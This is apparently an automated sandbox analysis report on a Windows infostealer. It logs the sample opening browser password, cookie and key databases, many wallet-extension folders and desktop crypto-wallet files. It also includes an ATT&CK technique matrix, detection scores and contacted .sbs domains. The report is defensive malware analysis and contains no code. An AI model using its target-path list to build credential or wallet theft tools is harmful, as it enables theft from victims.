              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1803965347.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1804145488.0000000001261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6568, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6568, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              11
              Process Injection
              34
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services31
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              11
              Process Injection
              LSASS Memory75
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe46%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              cook-rain.sbs
              172.67.155.248
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        peepburry828.sbsfalse
                          high
                          p10tgrace.sbsfalse
                            high
                            processhol.sbsfalse
                              high
                              https://cook-rain.sbs/apifalse
                                high
                                https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                  high
                                  p3ar11fter.sbsfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_109.6.drfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_109.6.drfalse
                                            high
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1796065405.0000000005B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.linkedin.com/cws/share?url=$chromecache_89.6.dr, chromecache_101.6.drfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1726720426.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750187521.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750347316.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1726872791.0000000005BB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Youssef1313chromecache_109.6.drfalse
                                                      high
                                                      https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_89.6.dr, chromecache_101.6.drfalse
                                                        high
                                                        https://aka.ms/msignite_docs_bannerchromecache_89.6.dr, chromecache_101.6.drfalse
                                                          high
                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_101.6.drfalse
                                                            high
                                                            http://polymer.github.io/AUTHORS.txtchromecache_89.6.dr, chromecache_101.6.drfalse
                                                              high
                                                              https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_109.6.drfalse
                                                                high
                                                                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_89.6.dr, chromecache_101.6.drfalse
                                                                  high
                                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_109.6.drfalse
                                                                    high
                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1796065405.0000000005B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://aka.ms/pshelpmechoosechromecache_89.6.dr, chromecache_101.6.drfalse
                                                                            high
                                                                            https://aka.ms/feedback/report?space=61chromecache_109.6.dr, chromecache_110.6.drfalse
                                                                              high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1726872791.0000000005B94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://learn-video.azurefd.net/vod/playerchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                    high
                                                                                    https://twitter.com/intent/tweet?original_referer=$chromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                      high
                                                                                      https://github.com/gewarrenchromecache_109.6.drfalse
                                                                                        high
